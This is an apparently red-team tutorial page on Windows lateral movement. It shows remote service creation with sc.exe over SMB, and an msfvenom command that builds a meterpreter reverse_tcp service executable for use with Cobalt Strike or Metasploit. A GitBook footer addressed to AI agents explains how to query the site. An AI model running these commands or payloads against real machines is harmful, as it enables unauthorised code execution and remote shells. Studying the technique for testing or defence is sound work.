> For the complete documentation index, see [llms.txt](https://blog.hacktive.bebzounette.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.hacktive.bebzounette.com/active-directory/lateral-movement/code-execution/service-control-sc.md). # Service Control (SC) {% hint style="warning" %} Administrator rights on the target machine are mandatory. {% endhint %} The Service Controller (sc) proves particularly valuable for attackers, enabling task scheduling via SMB. ```powershell sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe” sc \\host.domain start ExampleService ``` The caveat here is that the executable must specifically be a service binary. Service binaries differ in that they need to "register" with the Service Control Manager (SCM), and if not, they terminate execution. Hence, if a non-service binary is used for this purpose, it will come back as a brief agent/beacon for a moment and then terminate. Directly creating an executable that runs as a service is possible: [**CobaltStrike** ](https://www.cobaltstrike.com)**:** In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type. ![Executable Windows en tant que service dans CobaltStrike ](/files/FdTk7swlgqfskNSj6jCZ) [**Metasploit :** ](https://www.metasploit.com) Using msfvenom, specify the exe-service format: ```bash msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST= LPORT= -o service.exe ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.hacktive.bebzounette.com/active-directory/lateral-movement/code-execution/service-control-sc.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.